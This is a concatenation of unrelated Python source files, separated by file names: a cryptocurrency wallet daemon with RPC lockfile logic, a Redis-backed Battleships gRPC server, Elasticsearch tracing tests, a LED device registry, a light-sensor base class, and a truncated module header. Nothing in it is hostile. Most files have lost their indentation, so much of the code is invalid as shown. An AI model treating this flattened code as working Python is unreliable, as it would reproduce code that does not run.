# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ast
import base64
from typing import Optional, Tuple, Any
import os
import time
import jsonrpclib
from .app_state import app_state
from .commands import known_commands, Commands
from .exchange_rate import FxTask
from .jsonrpc import VerifyingJSONRPCServer
from .logs import logs
from .network import Network
from .simple_config import SimpleConfig
from .storage import WalletStorage
from .util import json_decode, DaemonThread, to_string, random_integer
from .version import PACKAGE_VERSION
from .wallet import ParentWallet
logger = logs.get_logger("daemon")
def get_lockfile(config: SimpleConfig) -> str:
return os.path.join(config.path, 'daemon')
def remove_lockfile(lockfile: str) -> None:
logger.debug("removing lockfile")
try:
os.unlink(lockfile)
except OSError:
pass
def get_fd_or_server(config: SimpleConfig) -> Tuple[Optional[int], Optional[jsonrpclib.Server]]:
'''Tries to create the lockfile, using O_EXCL to
prevent races. If it succeeds it returns the FD.
Otherwise try and connect to the server specified in the lockfile.
If this succeeds, the server is returned. Otherwise remove the
lockfile and try again.'''
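# The lockfile contents are written by Daemon.init_server() as
# repr(((host, port), create_time)), e.g. "(('127.0.0.1', 53021), 1588000000.0)"
# (illustrative values); get_server() below parses them with ast.literal_eval.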
lockfile = get_lockfile(config)
while True:
try:
return os.open(lockfile, os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o644), None
except OSError:
pass
server = get_server(config)
if server is not None:
return None, server
# Couldn't connect; remove lockfile and try again.
remove_lockfile(lockfile)
def get_server(config: SimpleConfig) -> Optional[jsonrpclib.Server]:
lockfile = get_lockfile(config)
while True:
create_time = None
server_url = None
try:
with open(lockfile) as f:
(host, port), create_time = ast.literal_eval(f.read())
rpc_user, rpc_password = get_rpc_credentials(config)
if rpc_password == '':
# authentication disabled
server_url = 'http://%s:%d' % (host, port)
else:
server_url = 'http://%s:%s@%s:%d' % (
rpc_user, rpc_password, host, port)
server = jsonrpclib.Server(server_url)
# Test daemon is running
server.ping()
return server
except ConnectionRefusedError:
logger.warning("get_server could not connect to the rpc server, is it running?")
except SyntaxError:
if os.path.getsize(lockfile):
logger.exception("RPC server lockfile exists, but is invalid")
else:
# Our caller 'get_fd_or_server' has created the empty file before we check.
logger.warning("get_server could not connect to the rpc server, is it running?")
except Exception:
# We do not want the full stacktrace, this will limit it.
logger.exception("attempt to connect to the RPC server failed")
if not create_time or create_time < time.time() - 1.0:
return None
# Sleep a bit and try again; it might have just been started
time.sleep(1.0)
def get_rpc_credentials(config: SimpleConfig) -> Tuple[Optional[str], Optional[str]]:
rpc_user = config.get('rpcuser', None)
rpc_password = config.get('rpcpassword', None)
if rpc_user is None or rpc_password is None:
rpc_user = 'user'
nbits = 128
pw_int = random_integer(nbits)
pw_b64 = base64.b64encode(
pw_int.to_bytes(nbits // 8, 'big'), b'-_')
rpc_password = to_string(pw_b64, 'ascii')
config.set_key('rpcuser', rpc_user)
config.set_key('rpcpassword', rpc_password, save=True)
elif rpc_password == '':
logger.warning('RPC authentication is disabled.')
return rpc_user, rpc_password
class Daemon(DaemonThread):
def __init__(self, fd, is_gui: bool) -> None:
super().__init__('daemon')
app_state.daemon = self
config = app_state.config
self.config = config
if config.get('offline'):
self.network = None
self.fx_task = None
else:
self.network = Network()
app_state.fx = FxTask(app_state.config, self.network)
self.fx_task = app_state.async_.spawn(app_state.fx.refresh_loop)
self.wallets = {}
# Setup JSONRPC server
self.init_server(config, fd, is_gui)
# self.init_thread_watcher()
def init_server(self, config: SimpleConfig, fd, is_gui: bool) -> None:
host = config.get('rpchost', '127.0.0.1')
port = config.get('rpcport', 0)
rpc_user, rpc_password = get_rpc_credentials(config)
try:
server = VerifyingJSONRPCServer((host, port), logRequests=False,
rpc_user=rpc_user, rpc_password=rpc_password)
except Exception as e:
logger.error('Warning: cannot initialize RPC server on host %s %s', host, e)
self.server = None
os.close(fd)
return
os.write(fd, bytes(repr((server.socket.getsockname(), time.time())), 'utf8'))
os.close(fd)
self.server = server
server.timeout = 0.1
server.register_function(self.ping, 'ping')
server.register_function(self.run_gui, 'gui')
server.register_function(self.run_daemon, 'daemon')
self.cmd_runner = Commands(self.config, None, self.network)
for cmdname in known_commands:
server.register_function(getattr(self.cmd_runner, cmdname), cmdname)
server.register_function(self.run_cmdline, 'run_cmdline')
def init_thread_watcher(self) -> None:
import threading
import sys
import traceback
def _watcher():
while True:
for th in threading.enumerate():
th_text = str(th)
# if "GUI" not in th_text:
# continue
print(th)
traceback.print_stack(sys._current_frames()[th.ident])
print()
time.sleep(5.0)
t = threading.Thread(target=_watcher)
t.daemon = True
t.start()
def ping(self) -> bool:
return True
def run_daemon(self, config_options: dict) -> Any:
config = SimpleConfig(config_options)
sub = config.get('subcommand')
assert sub in [None, 'start', 'stop', 'status', 'load_wallet', 'close_wallet']
if sub in [None, 'start']:
response = "Daemon already running"
elif sub == 'load_wallet':
path = config.get_wallet_path()
wallet = self.load_wallet(path, config.get('password'))
self.cmd_runner.parent_wallet = wallet
response = True
elif sub == 'close_wallet':
path = config.get_wallet_path()
if path in self.wallets:
self.stop_wallet_at_path(path)
response = True
else:
response = False
elif sub == 'status':
if self.network:
response = self.network.status()
response.update({
'fee_per_kb': self.config.fee_per_kb(),
'path': self.config.path,
'version': PACKAGE_VERSION,
'wallets': {k: w.is_synchronized() for k, w in self.wallets.items()},
})
else:
response = "Daemon offline"
elif sub == 'stop':
self.stop()
response = "Daemon stopped"
return response
def run_gui(self, config_options: dict) -> str:
config = SimpleConfig(config_options)
if hasattr(app_state, 'windows'):
config.open_last_wallet()
path = config.get_wallet_path()
app_state.app.new_window(path, config.get('url'))
return "ok"
return "error: ElectrumSV is running in daemon mode; stop the daemon first."
def load_wallet(self, path: str, password: Optional[str]) -> Optional[ParentWallet]:
# wizard will be launched if we return
if path in self.wallets:
wallet = self.wallets[path]
return wallet
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
return
if storage.is_encrypted():
if not password:
return
storage.decrypt(password)
if storage.requires_split():
return
if storage.requires_upgrade():
return
if storage.get_action():
return
parent_wallet = ParentWallet(storage)
self.start_wallet(parent_wallet)
return parent_wallet
def get_wallet(self, path: str) -> ParentWallet:
return self.wallets.get(path)
def start_wallet(self, parent_wallet: ParentWallet) -> None:
self.wallets[parent_wallet.get_storage_path()] = parent_wallet
parent_wallet.start(self.network)
def stop_wallet_at_path(self, path: str) -> None:
# Issue #659 wallet may already be stopped.
if path in self.wallets:
parent_wallet = self.wallets.pop(path)
parent_wallet.stop()
def stop_wallets(self):
for path in list(self.wallets.keys()):
self.stop_wallet_at_path(path)
def run_cmdline(self, config_options: dict) -> Any:
password = config_options.get('password')
new_password = config_options.get('new_password')
config = SimpleConfig(config_options)
cmdname = config.get('cmd')
cmd = known_commands[cmdname]
if cmd.requires_wallet:
path = config.get_wallet_path()
parent_wallet = self.wallets.get(path)
if parent_wallet is None:
return {'error': 'Wallet "%s" is not loaded. Use "electrum-sv daemon load_wallet"'
% os.path.basename(path)}
else:
parent_wallet = None
# arguments passed to function
args = [config.get(x) for x in cmd.params]
# decode json arguments
args = [json_decode(i) for i in args]
# options
kwargs = {}
for x in cmd.options:
kwargs[x] = (config_options.get(x) if x in ['password', 'new_password']
else config.get(x))
cmd_runner = Commands(config, parent_wallet, self.network)
func = getattr(cmd_runner, cmd.name)
result = func(*args, **kwargs)
return result
def run(self) -> None:
while self.is_running():
self.server.handle_request() if self.server else time.sleep(0.1)
logger.warning("no longer running")
if self.network:
logger.warning("wait for network shutdown")
self.fx_task.cancel()
app_state.async_.spawn_and_wait(self.network.shutdown_wait)
self.on_stop()
def stop(self) -> None:
logger.warning("stopping")
super().stop()
self.stop_wallets()
remove_lockfile(get_lockfile(self.config))
|
server.py
|
import backoff
import grpc
import logging
import queue
import redis
import threading
import time
import uuid
import log
from server.app.battleships_pb2 import Attack, Response, Status
from server.app.battleships_pb2_grpc import BattleshipsServicer
from server.app.game import Game
from server.app.message import Message
logger = log.get_logger(__name__)
logger.setLevel(logging.DEBUG)
class Battleship(BattleshipsServicer):
def __init__(self, redis_host, redis_port='6379', db=0):
"""Create a Battleship (server) instance.
:param redis_host: Hostname of Redis instance
:param redis_port: Port of Redis instance
:param db: Database to use within Redis instance
:raise ConnectionError: if connection to Redis fails
"""
logger.info('Starting Battleship. Connect to Redis '
f'at {redis_host}:{redis_port}.')
self.__r = redis.Redis(host=redis_host, port=redis_port, db=db)
if not self.ping_redis():
raise ConnectionError('Unable to connect to Redis server!')
else:
logger.info('Battleship server connected to Redis server.')
def Game(self, request_iterator, context):
"""This method is the implementation of the gRPC Game service.
When connected, this provides the main functionality of the
Battleship game.
:param request_iterator: iterator providing gRPC requests
:param context: a gRPC context object
:return: A generator providing gRPC responses
"""
server = _Server(self.__r)
with server:
yield from server.start(request_iterator, context)
def ping_redis(self):
"""Ping a Redis instance to see whether it's alive.
:return: True if connection to instance established, False otherwise
"""
@backoff.on_exception(backoff.expo,
redis.exceptions.ConnectionError,
max_time=60)
def __ping_redis():
"""Convenience function that does the actual Redis PING.
"""
logger.info('Pinging Redis server...')
return self.__r.ping()
try:
return __ping_redis()
except redis.exceptions.ConnectionError:
logger.error('Problem pinging Redis. Retry?')
return False
class _Server:
OpenGames = 'openGames'
def __init__(self, _redis):
self.__r = _redis
self.__q = queue.Queue()
self.__e = threading.Event()
self.__e.set()
self.__stream = None
self.__context = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
def start(self, request_iterator, context):
"""Method that starts the actual server.
:param request_iterator: iterator that provides messages
:param context: gRPC context object
"""
self.__stream = request_iterator
self.__context = context
while True:
request = self.recv()
if request is not None:
break
if not request.HasField('join'):
logger.error('Not a join message!')
return
player_id = request.join.id
if player_id == '':
logger.error('Player message ID is empty')
return
logger.info(f'Player {player_id} is attempting to join')
game, is_new = self.find_game_or_create()
logger.info(f'Connecting to game {game.id}. '
f'New? {"Yes" if is_new else "No"}')
logger.info('Setting up server to start receiving PubSub messages')
pubsub_thread = self.subscribe_redis(game, player_id)
if not self.connect_game(game, player_id, is_new):
logger.error('Unable to connect to a game!')
return
game_thread = self.subscribe_grpc(game, player_id)
yield from self.get()
logger.info('Stopping all threads')
game_thread.join()
pubsub_thread.stop()
self.close_open_game(game)
def stop(self):
"""Stop the game from running.
"""
self.__e.clear()
def connect_game(self, game, player_id, is_new):
"""Join an existing game or advertise this one as open if game
is not yet in progress.
:param game: Game
:param player_id: ID of player
:param is_new: True if game is new, False otherwise
"""
if is_new:
return self.add_open_game(game)
if not self.ensure_subscribers(game, 2):
return False
msg = Message(Message.BEGIN, player_id, '')
self.publish(game.id, msg)
return True
def recv(self):
"""Receive a gRPC message.
:return: gRPC message that was received
"""
try:
return next(self.__stream)
except grpc.RpcError:
logger.error('An RPC error occurred!')
self.stop()
except StopIteration:
logger.warning('recv() - iteration stopped')
self.stop()
def send(self, response):
"""Send a gRPC message.
:param response: Response to send to the client
"""
self.__q.put_nowait(response)
def get(self):
"""Get next message from the queue. It keeps running until it
sees that the is_running flag is False, then it returns.
:return: Next message in queue
"""
while self.is_running:
try:
yield self.__q.get(timeout=0.5)
except queue.Empty:
pass
@property
def is_running(self):
"""Is the game still running?
:return: True if running, False otherwise
"""
return self.__e.is_set()
def close(self):
"""Close connections, like the connection to the Redis instance.
"""
self.__r.close()
def subscribe_grpc(self, game, player_id):
"""Create a thread that handles incoming gRPC requests.
:param game: Game to handle requests for
:param player_id: Player this game server is handling
:return: Thread handling the gRPC requests
"""
game_thread = threading.Thread(
target=lambda: self.handle_grpc(game, player_id))
game_thread.daemon = True
game_thread.start()
return game_thread
def handle_grpc(self, game, player_id):
"""Handle actual gRPC requests.
:param game: Game to handle
:param player_id: Id of player this game server is handling
"""
while True:
request = self.recv()
if request is None:
return
if request.HasField('move'):
vector = request.move.vector
logger.info(f'({player_id}) - gRPC - {{Attack}} - '
f'{vector}')
# It must be my move if we have to handle an Attack
if game.my_turn:
msg = Message(Message.ATTACK, player_id, vector)
self.publish(game.id, msg)
else:
logger.error(f'({player_id}) - gRPC - '
'Got {Attack} request but not my turn!')
elif request.HasField('report'):
state = request.report.state
logger.info(f'({player_id}) - gRPC - {{Report}} - {state}. '
f'My Turn? {"Yes" if game.my_turn else "No"}.')
# It must not be my move if we have to handle a Report
if not game.my_turn:
if state == Status.State.DEFEAT:
msg = Message(Message.LOST, player_id, '')
else:
msg = Message(Message.STATUS, player_id, str(state))
self.publish(game.id, msg)
else:
logger.error(f'({player_id}) - gRPC - '
'Got {Report} request but my turn!')
else:
logger.error('Received an unknown message type!')
@property
def redis_conn(self):
"""Return Redis client as a property.
"""
return self.__r
def publish(self, channel, message):
"""Publish a message to Redis PubSub on a certain channel.
:param channel: Channel to use
:param message: Message to publish
"""
self.__r.publish(channel, message.dumps())
def subscribe_redis(self, game, player_id):
"""Subscribe to game.id channel but in a separate thread.
The handler that is used for the pubsub message is called
handle_pubsub, which is a method of this class.
:param game: Game of which the ID is used to subscribe
:param player_id: ID of player this game server is handling
:return: Thread that the handler is running in
"""
def get_pubsub_handler():
def handle_pubsub(msg):
return self.handle_pubsub(msg, game, player_id)
return handle_pubsub
logger.info(f'Subscribing to channel {game.id}')
p = self.__r.pubsub(ignore_subscribe_messages=True)
p.subscribe(**{game.id: get_pubsub_handler()})
thread = p.run_in_thread(sleep_time=0.001)
return thread
def handle_pubsub(self, msg, game, player_id):
"""Handle published messages from Redis PubSub.
:param msg: PubSub message to handle
:param game: Game for which to handle messages
:param player_id: Player for which we're receiving messages
"""
message = Message.recreate(msg['data'])
message_type = message.type
if message_type == Message.BEGIN:
response = Response(turn=Response.State.BEGIN)
self.send(response)
if message.player == player_id:
# Stop this player's turn (this will start other player's turn)
message = Message(Message.STOP_TURN, player_id, '')
self.publish(game.id, message)
elif message_type == Message.STOP_TURN:
logger.info(f'({player_id}) - pubsub - '
f'Received STOP_TURN from player {message.player}')
if message.player == player_id:
logger.info(f'({player_id}) - '
f'Ending turn for player {player_id}')
game.end_turn()
turn = Response.State.STOP_TURN
else:
logger.info(f'({player_id}) - '
f'Starting turn for player {player_id}')
game.start_turn()
turn = Response.State.START_TURN
self.send(Response(turn=turn))
elif message_type == Message.ATTACK:
logger.info(f'({player_id}) - pubsub - '
f'Received ATTACK from player {message.player} '
f'with vector {message.data}.')
if message.player != player_id:
self.send(Response(move=Attack(vector=message.data)))
elif message_type == Message.STATUS:
states = {
'0': ('MISS', Status.State.MISS),
'1': ('HIT', Status.State.HIT),
'2': ('DEFEAT', Status.State.DEFEAT),
}
state = states[message.data][0]
logger.info(f'({player_id}) - pubsub - '
f'Received STATUS from player {message.player} with '
f'state {state}.')
if message.player != player_id:
state = states[message.data][1]
self.send(Response(report=Status(state=state)))
# Stop this player's turn (this will start other
# player's turn). Because the status comes from the
# other player, it means that this player is the one who
# attacked and hence whose turn it was.
message = Message(Message.STOP_TURN, player_id, '')
self.publish(game.id, message)
elif message_type == Message.LOST:
logger.info(f'({player_id}) - pubsub - '
f'Received LOST from player {message.player}.')
turn = Response.State.LOSE
if message.player != player_id:
turn = Response.State.WIN
self.send(Response(turn=turn))
self.stop()
def ensure_subscribers(self, game, n):
"""Ensure that {n} listeners are subscribed to the id of the
game passed in as a parameter.
:param game: Game of which the ID is checked
:param n: The number of subscribers we're expecting
"""
for x in range(5):
values = self.__r.pubsub_numsub(game.id)
if len(values) < 1:
return False
_, nsub = values[0]
if n == nsub:
return True
time.sleep(0.1)
logger.error(f'Timeout trying to ensure {n} subscribers')
return False
def find_game_or_create(self):
"""Try to find an open game in Redis or create a new game if
none found.
:return: A tuple containing a Game object and a flag is_new
which indicates that a new game was created.
"""
b_game_id = self.__r.rpop(self.OpenGames)
# b_game_id is None if no open game found
is_new = b_game_id is None
if is_new:
logger.info('Could not find open game, creating new one')
game_id = str(uuid.uuid4())
else:
game_id = b_game_id.decode('utf-8')
return Game(game_id), is_new
def add_open_game(self, game):
"""Add an open game to the Redis instance so it can be discovered.
:param game: Game to be advertised
:return: True if successful, False otherwise
"""
logger.info(f'Adding open game {game.id}')
return self.__r.lpush(self.OpenGames, game.id)
def close_open_game(self, game):
"""Remove an open game from the Redis instance so it can no longer
be discovered.
:param game: Game to be closed
"""
logger.info(f'Closing open game {game.id}')
return self.__r.lrem(self.OpenGames, 1, game.id)
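# Minimal serving sketch (illustrative only, not part of the original module).
# It assumes the generated helper add_BattleshipsServicer_to_server exists in
# server.app.battleships_pb2_grpc (the name gRPC conventionally generates for
# the Battleships service) and that a Redis instance is reachable on localhost;
# the port and worker count are placeholders.
if __name__ == '__main__':
    from concurrent import futures
    from server.app.battleships_pb2_grpc import add_BattleshipsServicer_to_server
    grpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
    add_BattleshipsServicer_to_server(Battleship(redis_host='localhost'), grpc_server)
    grpc_server.add_insecure_port('[::]:50051')
    grpc_server.start()
    grpc_server.wait_for_termination()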
|
test_lowlevel.py
|
import datetime
import unittest
import threading
from opentracing.mocktracer import MockTracer
from mock import patch
from elasticsearch import Elasticsearch
from elasticsearch_opentracing import TracingTransport, init_tracing, \
enable_tracing, disable_tracing, set_active_span, get_active_span, _clear_tracing_state
from .dummies import *
@patch('elasticsearch.Transport.perform_request')
class TestTracing(unittest.TestCase):
def setUp(self):
self.tracer = MockTracer()
self.es = Elasticsearch(transport_class=TracingTransport)
def tearDown(self):
_clear_tracing_state()
self.tracer.reset()
def test_tracing(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False, prefix='Prod007')
mock_perform_req.return_value = {'hits': []}
enable_tracing()
with self.tracer.start_active_span('parentSpan') as scope:
main_span = scope.span
body = {"any": "data", "timestamp": datetime.datetime.now()}
res = self.es.index(index='test-index', doc_type='tweet', id=1,
body=body, params={'refresh': True})
self.assertEqual(mock_perform_req.return_value, res)
spans = self.tracer.finished_spans()
self.assertEqual(2, len(spans))
es_span = spans[0]
self.assertEqual(es_span.operation_name, 'Prod007/test-index/tweet/1')
self.assertEqual(es_span.parent_id, main_span.context.span_id)
self.assertEqual(es_span.tags, {
'component': 'elasticsearch-py',
'db.type': 'elasticsearch',
'db.statement': body,
'span.kind': 'client',
'elasticsearch.url': '/test-index/tweet/1',
'elasticsearch.method': 'PUT',
'elasticsearch.params': {'refresh': True},
})
def test_trace_none(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
self.es.get(index='test-index', doc_type='tweet', id=3)
self.assertEqual(0, len(self.tracer.finished_spans()))
def test_trace_all_requests(self, mock_perform_req):
init_tracing(self.tracer)
for i in range(3):
self.es.get(index='test-index', doc_type='tweet', id=i)
spans = self.tracer.finished_spans()
self.assertEqual(3, len(spans))
enable_tracing()
disable_tracing() # Shouldn't prevent further tracing
self.es.get(index='test-index', doc_type='tweet', id=4)
spans = self.tracer.finished_spans()
self.assertEqual(4, len(spans))
self.assertTrue(all(map(lambda x: x.parent_id is None, spans)))
def test_trace_all_requests_span(self, mock_perform_req):
init_tracing(self.tracer)
main_span = self.tracer.start_span()
set_active_span(main_span)
for i in range(3):
self.es.get(index='test-index', doc_type='tweet', id=i)
spans = self.tracer.finished_spans()
self.assertEqual(3, len(spans))
self.assertTrue(all(map(lambda x: x.parent_id == main_span.context.span_id, spans)))
def test_trace_bool_payload(self, mock_perform_req):
init_tracing(self.tracer)
# Some operations, such as creating an index, return a bool value.
mock_perform_req.return_value = False
mapping = "{'properties': {'body': {}}}"
res = self.es.indices.create('test-index', body=mapping)
self.assertFalse(res)
spans = self.tracer.finished_spans()
self.assertEqual(1, len(spans))
def test_trace_result_tags(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
mock_perform_req.return_value = {
'found': False,
'timed_out': True,
'took': 7
}
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
spans = self.tracer.finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual('False', spans[0].tags['elasticsearch.found'])
self.assertEqual('True', spans[0].tags['elasticsearch.timed_out'])
self.assertEqual('7', spans[0].tags['elasticsearch.took'])
def test_disable_tracing(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
disable_tracing()
self.assertEqual(0, len(self.tracer.finished_spans()))
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(0, len(self.tracer.finished_spans()))
disable_tracing() # shouldn't cause a problem
def test_disable_tracing_span_legacy(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
main_span = self.tracer.start_span()
set_active_span(main_span)
# Make sure the active span was preserved
enable_tracing()
disable_tracing()
self.assertEqual(main_span, get_active_span())
# Make sure it was preserved, by tracing.
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(1, len(self.tracer.finished_spans()))
self.assertEqual(main_span.context.span_id, self.tracer.finished_spans()[0].parent_id)
def test_disable_tracing_span(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
with self.tracer.start_active_span('parentSpan') as scope:
main_span = scope.span
enable_tracing()
disable_tracing()
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(2, len(self.tracer.finished_spans()))
self.assertEqual(main_span.context.span_id, self.tracer.finished_spans()[0].parent_id)
def test_trace_error(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
with self.tracer.start_active_span('parentSpan') as scope:
main_span = scope.span
enable_tracing()
mock_perform_req.side_effect = RuntimeError()
caught_exc = None
try:
self.es.get(index='test-index', doc_type='tweet', id=1)
except RuntimeError as exc:
caught_exc = exc
spans = self.tracer.finished_spans()
self.assertEqual(2, len(spans))
span = spans[0]
self.assertEqual(main_span.context.span_id, span.parent_id)
self.assertEqual(True, span.tags['error'])
self.assertEqual(caught_exc, span.tags['error.object'])
def test_trace_after_error(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
mock_perform_req.side_effect = RuntimeError()
caught_exc = None
try:
self.es.get(index='test-index', doc_type='tweet', id=1)
except RuntimeError as exc:
caught_exc = exc
mock_perform_req.side_effect = None
self.es.get(index='test-index', doc_type='tweet', id=1)
spans = self.tracer.finished_spans()
self.assertEqual(2, len(spans))
error_span, span = spans
self.assertEqual(True, error_span.tags['error'])
self.assertEqual(caught_exc, error_span.tags['error.object'])
self.assertNotIn('error', span.tags)
def test_multithreading(self, mock_perform_req):
init_tracing(self.tracer)
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, make thread-1 wait before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1():
with self.tracer.start_active_span('parentSpan'):
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
ev.set()
ev.wait()
disable_tracing()
def target2():
ev.wait()
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=2)
ev.set()
disable_tracing()
t1 = threading.Thread(target=target1)
t2 = threading.Thread(target=target2)
t1.start()
t2.start()
t1.join()
t2.join()
spans = self.tracer.finished_spans()
self.assertEqual(3, len(spans))
self.assertEqual([False, True, True], [s.parent_id is None for s in spans])
|
__init__.py
|
from ledfx.utils import BaseRegistry, RegistryLoader
from abc import abstractmethod
from threading import Thread
from ledfx.events import DeviceUpdateEvent, Event
import voluptuous as vol
import numpy as np
import importlib
import pkgutil
import logging
import time
import os
import re
_LOGGER = logging.getLogger(__name__)
@BaseRegistry.no_registration
class Device(BaseRegistry):
CONFIG_SCHEMA = vol.Schema({
vol.Required('name', description='Friendly name for the device'): str,
vol.Optional('max_brightness', description='Max brightness for the device', default=1.0): vol.All(vol.Coerce(float), vol.Range(min=0, max=1)),
vol.Optional('center_offset', description='Number of pixels from the perceived center of the device', default=0): int,
vol.Optional('refresh_rate', description='Rate that pixels are sent to the device', default=60): int,
vol.Optional('force_refresh', description='Force the device to always refresh', default=False): bool,
vol.Optional('preview_only', description='Preview the pixels without updating the device', default=False): bool
})
_active = False
_output_thread = None
_active_effect = None
def __init__(self, ledfx, config):
self._ledfx = ledfx
self._config = config
def __del__(self):
if self._active:
self.deactivate()
@property
def pixel_count(self):
pass
def set_effect(self, effect, start_pixel = None, end_pixel = None):
if self._active_effect is not None:
self._active_effect.deactivate()
self._active_effect = effect
self._active_effect.activate(self.pixel_count)
#self._active_effect.setDirtyCallback(self.process_active_effect)
if not self._active:
self.activate()
def clear_effect(self):
if self._active_effect is not None:
self._active_effect.deactivate()
self._active_effect = None
if self._active:
# Clear all the pixel data before deactivating the device
assembled_frame = np.zeros((self.pixel_count, 3))
self.flush(assembled_frame)
self._ledfx.events.fire_event(DeviceUpdateEvent(
self.id, assembled_frame))
self.deactivate()
@property
def active_effect(self):
return self._active_effect
def process_active_effect(self):
# Assemble the frame if necessary, if nothing changed just sleep
assembled_frame = self.assemble_frame()
if assembled_frame is not None:
if not self._config['preview_only']:
self.flush(assembled_frame)
def trigger_device_update_event():
self._ledfx.events.fire_event(DeviceUpdateEvent(
self.id, assembled_frame))
self._ledfx.loop.call_soon_threadsafe(trigger_device_update_event)
def thread_function(self):
# TODO: Evaluate switching over to asyncio with UV loop optimization
# instead of spinning a separate thread.
sleep_interval = 1 / self._config['refresh_rate']
if self._active:
self._ledfx.loop.call_later(sleep_interval, self.thread_function)
self.process_active_effect()
# while self._active:
# start_time = time.time()
# self.process_active_effect()
# # Calculate the time to sleep accounting for potential heavy
# # frame assembly operations
# time_to_sleep = sleep_interval - (time.time() - start_time)
# if time_to_sleep > 0:
# time.sleep(time_to_sleep)
# _LOGGER.info("Output device thread terminated.")
def assemble_frame(self):
"""
Assembles the frame to be flushed. Currently this just returns
the active channel's pixels, but it will eventually handle things like
merging multiple segments and alpha blending channels
"""
frame = None
if self._active_effect._dirty:
frame = np.clip(self._active_effect.pixels * self._config['max_brightness'], 0, 255)
if self._config['center_offset']:
frame = np.roll(frame, self._config['center_offset'], axis = 0)
self._active_effect._dirty = self._config['force_refresh']
return frame
def activate(self):
self._active = True
#self._device_thread = Thread(target = self.thread_function)
#self._device_thread.start()
self._device_thread = None
self.thread_function()
def deactivate(self):
self._active = False
if self._device_thread:
self._device_thread.join()
self._device_thread = None
@abstractmethod
def flush(self, data):
"""
Flushes the provided data to the device. This abstract method must be
overridden by the device implementation (see the illustrative sketch at the
end of this module).
"""
@property
def name(self):
return self._config['name']
@property
def max_brightness(self):
return self._config['max_brightness'] * 256
@property
def refresh_rate(self):
return self._config['refresh_rate']
class Devices(RegistryLoader):
"""Thin wrapper around the device registry that manages devices"""
PACKAGE_NAME = 'ledfx.devices'
def __init__(self, ledfx):
super().__init__(ledfx, Device, self.PACKAGE_NAME)
def cleanup_effects(e):
self.clear_all_effects()
self._ledfx.events.add_listener(
cleanup_effects, Event.LEDFX_SHUTDOWN)
def create_from_config(self, config):
for device in config:
_LOGGER.info("Loading device from config: {}".format(device))
self._ledfx.devices.create(
id = device['id'],
type = device['type'],
config = device['config'],
ledfx = self._ledfx)
if 'effect' in device:
effect = self._ledfx.effects.create(
ledfx = self._ledfx,
type = device['effect']['type'],
config = device['effect']['config'])
self._ledfx.devices.get_device(device['id']).set_effect(effect)
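# Illustrative shape of the config list consumed by create_from_config() above;
# the field names mirror the lookups in the method, the values are assumptions:
#
# config = [{
#     'id': 'bedroom-strip',
#     'type': 'udp',
#     'config': {'name': 'Bedroom Strip', 'refresh_rate': 60},
#     'effect': {'type': 'rainbow', 'config': {}},
# }]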
def clear_all_effects(self):
for device in self.values():
device.clear_effect()
def get_device(self, device_id):
for device in self.values():
if device_id == device.id:
return device
return None
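# Illustrative sketch (not part of the original package) of a concrete Device
# subclass satisfying the abstract interface above; the fixed pixel count and
# the print-based flush() are assumptions for demonstration only.
#
# class ConsoleDevice(Device):
#     @property
#     def pixel_count(self):
#         return 10
#
#     def flush(self, data):
#         # 'data' arrives as an Nx3 numpy array of RGB values, already scaled
#         # by max_brightness and rolled by center_offset in assemble_frame()
#         print(data.astype(int))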
|
generic_light_sensor.py
|
from abc import abstractmethod, ABC
from threading import Thread
from time import sleep
BRIGHTNESS_MOV_AVE_SAMPLES = 20 # number of samples used in the moving average for the brightness (response time [s] ~ samples_number*sample_interval)
BRIGHTNESS_SAMPLE_INTERVAL = 0.5 # period in s for the brightness sampling with the sensor
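# e.g. with the defaults above, the smoothing response time is roughly 20 * 0.5 s = 10 s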
class GenericLightSensor(ABC):
def __init__(self, app):
self.app = app
self._is_running = False
self._check_interval = BRIGHTNESS_SAMPLE_INTERVAL
self._history = []
def start(self):
"""Starts the light sensor
When the light sensor is started, will control the brightness of the LEDs automatically. Will change it according to the last given color (can only dim)"""
self._is_running = True
self._th = Thread(target = self._thf)
self._th.name = "light_sensor"
self._th.start()
def stop(self):
"""Stops the light sensor from controlling the LED strip"""
self._is_running = False
self._history = []
self.app.lmanager.set_brightness(1)
def _thf(self):
while self._is_running:
sleep(self._check_interval)
brightness = self.get_brightness()
if len(self._history) == BRIGHTNESS_MOV_AVE_SAMPLES:
self._history.pop(0)
self._history.append(brightness)
brightness = sum(self._history)/float(len(self._history))
self.app.logger.info("Averaged brightness: {}".format(brightness)) # FIXME remove this
self.app.lmanager.set_brightness(brightness)
def deinit(self):
"""Deinitializes the sensor hw"""
pass
@abstractmethod
def get_brightness(self):
"""Returns the actual level of brightness to use"""
@abstractmethod
def is_connected(self):
"""Returns true if the sensor is connected correctly"""
|
instlMisc.py
|
#!/usr/bin/env python3.9
import os
import sys
import time
import shlex
import threading
from collections import namedtuple
from .instlInstanceBase import InstlInstanceBase
from . import connectionBase
from pybatch import *
import utils
import psutil
# noinspection PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences
class InstlMisc(InstlInstanceBase):
